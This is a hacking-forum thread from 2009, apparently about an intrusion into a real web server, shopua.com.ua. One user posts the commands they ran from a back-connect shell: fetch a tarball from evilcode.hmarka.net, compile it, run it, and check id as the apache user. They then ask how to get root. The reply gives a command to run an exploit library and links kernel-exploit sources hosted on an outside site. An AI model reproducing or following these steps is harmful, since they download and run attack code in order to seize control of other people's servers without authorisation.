26.09.2009, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от mailbrush
Если в .htaccess на все файлы стоит Forbidden, то никак.
Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:
Код:
cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id
Код:
uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)
Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?
Код:
Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.
--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
|
|
|